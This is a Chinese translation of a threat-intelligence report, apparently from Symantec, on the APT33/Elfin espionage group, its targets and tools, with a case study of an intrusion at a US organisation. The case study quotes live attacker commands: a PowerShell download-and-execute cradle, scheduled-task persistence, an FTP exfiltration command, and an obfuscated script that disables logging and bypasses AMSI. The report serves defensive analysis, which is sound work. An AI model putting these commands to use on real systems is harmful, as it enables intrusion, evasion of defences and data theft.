雨露均沾——間諜組織APT33不僅關注中東地區,美國也是該組織的一個重要目標
Elfin間諜組織(又稱APT33)在過去三年中一直高度活躍,攻擊沙烏地阿拉伯、美國和其他一些國家的至少50個機構。
該組織於2015年底左右首次開展活動,專門掃描易受攻擊的網站用於識別潛在目標,藉此開展攻擊或建立命令和控制(C&C)基礎設施。它已經入侵了大量的目標,包括政府以及科研,化學,工程,製造,諮詢,金融,電信和其他多個行業的機構。
圖1.按國家劃分的Elfin攻擊[2016-2019]
一、諸多美國目標
Elfin繼續大力關注沙烏地阿拉伯,其佔賽門鐵克自2016年初以來統計的攻擊事件的42%。然而,美國也是該組織的一個重要目標,過去三年中有18個機構受到攻擊。多年來,包括多家財富500強企業。
Elfin在美國的目標包括工程,化學,研究,能源諮詢,金融,IT和醫療保健領域的機構。
圖2. 按行業劃分的Elfin攻擊[2016-2019]
為了加大供應鏈攻擊,其中一些美國機構也成為了Elfin的目標。在一個例子中,一家大型美國公司在同一個月遭到攻擊,而其中東公司也受到了入侵。
圖3. 按月劃分的Elfin攻擊[2016-2019]
二、漏洞利用
在2019年2月的攻擊浪潮中,Elfin試圖利用WinRAR中的一個已知漏洞(CVE-2018-20250)。WinRAR是一種廣泛使用的檔案歸檔和壓縮的實用程式,能夠建立自解壓歸檔檔案。該漏洞利用的目標是一家沙烏地阿拉伯化工企業。如果在未打補丁的計算機上成功利用此漏洞,則該漏洞允許攻擊者在計算機上安裝任何檔案,從而允許在目標計算機上執行程式碼。
目標機構中的兩個使用者收到一個名為“JobDetails.rar”的檔案,該檔案試圖利用WinRAR漏洞。此檔案可能是通過魚叉式網路釣魚郵件傳送的。但是,在此次嘗試攻擊之前,賽門鐵克已採取主動防護,以防止任何利用此漏洞的企圖(Exp.CVE-2018-20250 )。該防護成功的保護了目標機構免受攻擊。
三、與Shamoon關聯
Elfin於2018年12月成為人們關注的焦點,當時它與新一輪的Shamoon襲擊有關。沙烏地阿拉伯的一名Shamoon受害者最近也遭到了Elfin的攻擊,並且感染了Elfin使用的Stonedrill惡意軟體(Trojan.Stonedrill )。因為Elfin和Shamoon對該機構的攻擊發生得如此緊密,所以有人猜測這兩個組織可能有關聯。但是,賽門鐵克沒有發現有進一步的證據表明Elfin與這些Shamoon攻擊有關。我們會繼續密切監察兩個組織的活動。
四、Elfin的工具集
Elfin在其攻擊中部署了各種工具,包括自定義惡意軟體、商品惡意軟體和開源黑客工具。
該組織使用的自定義惡意軟體包括:
· Notestuk(Backdoor.Notestuk )(又名TURNEDUP):可用於開啟後門並從受感染計算機收集資訊的惡意軟體。
· Stonedrill(Trojan.Stonedrill):自定義惡意軟體能夠在受感染的計算機上開啟後門並下載其他檔案。該惡意軟體還具有破壞性元件,可以擦除受感染計算機的主引導記錄。
· AutoIt後門:使用AutoIt指令碼語言編寫的自定義後門。
除了自定義惡意軟體外,Elfin還使用了許多商品惡意軟體工具,可以在地下網路購買。包括:
· Remcos(Backdoor.Remvio ):一種商品遠端管理工具(RAT),可用於竊取受感染計算機的資訊。
·DarkComet(Backdoor.Breut ):另一種商品RAT,用於在受感染的計算機上開啟後門並竊取資訊。
· Quasar RAT(Trojan.Quasar ):商品RAT,可用於竊取密碼並在受感染的計算機上執行命令。
· Pupy RAT(Backdoor.Patpoopy ):可以在受感染的計算機上打開後門的商品RAT。
· NanoCore(Trojan.Nancrat t):商品RAT用於在受感染的計算機上開啟後門並竊取資訊。
·NetWeird(Trojan.Netweird.B ):一種可以開啟後門並從受感染計算機中竊取資訊的商品木馬。它還能下載其他潛在的惡意檔案。
Elfin還經常使用一些公開的黑客工具,包括:
·LaZagne(SecurityRisk.LaZagne ):一種登入/密碼獲取工具。
· Mimikatz(Hacktool.Mimikatz ):旨在竊取憑證的工具。
·Gpppassword:用於獲取和解密組策略首選項(GPP)密碼的工具。
·SniffPass(SniffPass ):旨在通過嗅探網路流量來竊取密碼的工具。
五、案例研究:Elfin攻擊是如何展開的
在本節中,我們將詳細描述Elfin對美國機構的攻擊。在2018年2月12日16:45(所有時間都為該機構的當地時間),向該機構傳送了一封電子郵件,宣稱一家美國全球服務提供商的職位空缺。該電子郵件包含惡意連結hxxp://mynetwork.ddns[DOT].net:880。
收件人單擊該連結將繼續下載並開啟惡意HTML可執行檔案,該檔案又通過嵌入式iframe從C&C伺服器載入內容。同時,此檔案中嵌入的程式碼還執行了PowerShell命令,以便從C&C伺服器下載並執行chfeeds.vbe的副本。
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object Net.WebClient).DownloadString('hxxps://217.147.168[DOT]46:8088/index.jpg');
還執行了第二個JavaScript命令,它建立了一個計劃任務,每天多次執行chfeeds.vbe。
a.run('%windir%\\System32\\cmd.exe /c PowerShell -window hidden schtasks.exe /CREATE /SC DAILY /TN "1" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 01:00 /f && schtasks.exe /CREATE /SC DAILY /TN "3" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 03:00 /f && schtasks.exe /CREATE /SC DAILY /TN "5" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 05:00 /f && schtasks.exe /CREATE /SC DAILY /TN "7" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 07:00 /f && schtasks.exe /CREATE /SC DAILY /TN "9" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 09:00 /f && schtasks.exe /CREATE /SC DAILY /TN "11" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 11:00 /f && schtasks.exe /CREATE /SC DAILY /TN "13" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 13:00 /f && schtasks.exe /CREATE /SC DAILY /TN "15" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 15:00 /f && schtasks.exe /CREATE /SC DAILY /TN "17" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 17:00 /f && schtasks.exe /CREATE /SC DAILY /TN "19" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 19:00 /f && schtasks.exe /CREATE /SC DAILY /TN "21" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 21:00 /f && schtasks.exe /CREATE /SC DAILY /TN "23" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 23:00 /f ')
chfeeds.vbe檔案充當下載程式,用於下載第二個PowerShell指令碼(registry.ps1)。該指令碼依次從C&C伺服器(hxxps:// host-manager.hopto.org)下載並執行名為POSHC2的PowerShell後門,這是一個代理感知的C&C框架。後來在20:57,攻擊者在受感染的計算機上變得活躍,然後繼續下載WinRAR。
89.34.237.118808hxxp://89.34.237[DOT]118:808/Rar32.exe
在23:29,攻擊者隨後開始部署他們的POSHC2 stager的更新版本。
192.119.15.35880hxxp://mynetwork.ddns[DOT]net:880/st-36-p4578.ps1
該工具在2月12日23:29和2月13日07:47之間多次下載。
兩天後,即2月14日15:12,攻擊者返回並將Quasar RAT安裝到與C&C伺服器(217.147.168.123)通訊的受感染計算機上。Quasar RAT安裝到
CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe.。
此時,攻擊者在保持訪問網路的同時停止活動,直到2月21日。在06:38,觀察到攻擊者將自定義.NET FTP工具下載到受感染的計算機。
192.119.15.36880hxxp://192.119.15[DOT]36:880/ftp.exe
後來在6:56,攻擊者使用此FTP工具將資料傳輸到遠端主機:
JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\appdata\roaming\adobe\rar -a ftp://89.34.237.118:2020 -f /[REDACTED] -u [REDACTED] -p [REDACTED]
活動停止,直到攻擊者在3月5日返回,使用Quasar RAT從hxxp://192.119.15 [DOT] 36:880 / ftp.exe下載第二個自定義AutoIt FTP工具,稱為FastUploader。然後將此工具安裝到hxxp://192.119.15[DOT]36:880/ftp.exe。FastUploader是一種自定義FTP工具,旨在以比傳統FTP客戶端更快的速度傳輸資料。
此時,攻擊者的其他活動在3月5日到4月之間繼續,4月18日11:50,第二個遠端訪問工具DarkComet被部署到受感染計算機上的csidl_profile\appdata\roaming\microsoft\windows\start menu\programs\startup\smss.exe。15秒後,安裝憑證轉儲到csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe,通過免費的PowerShell Empire執行PowerShell命令來繞過受感染機器上的日誌記錄。
$GPF=[Ref].AsSeMBLy.GeTTYPe('System.Management.Automation.Utils')."GEtFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GeTVALUE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[COlLecTIons.GEneRic.DIctIoNARy[stRiNG,SyStEM.Object]]::nEw();$VAL.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add ('EnableScriptBlockInvocationLogging',0);$GPC ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSe{[SCRIPTBLOck]."GEtFiE`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NuLL,(New-ObjeCt ColLectiONs.GeNERic.HASHSEt[StrInG]))}[REF].AssemBLy.GetTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SETValUe($nUll,$TrUE)};
攻擊活動在整個4月繼續進行,其中部署了其他版本的DarkComet,POSHC2植入程式和AutoIt後門,以及進一步的憑證轉儲。
六、活躍的攻擊者
Elfin是目前在中東地區最活躍的惡意組織之一,針對不同行業的眾多機構。在過去的三年中,該組織利用各種工具對付受害者,從定製的惡意軟體到現成的RAT,表明其不斷修改其策略,尋找下一步攻擊的工具。
七、保護/緩解
賽門鐵克提供以下保護措施,以保護客戶免受這些攻擊:
基於檔案的保護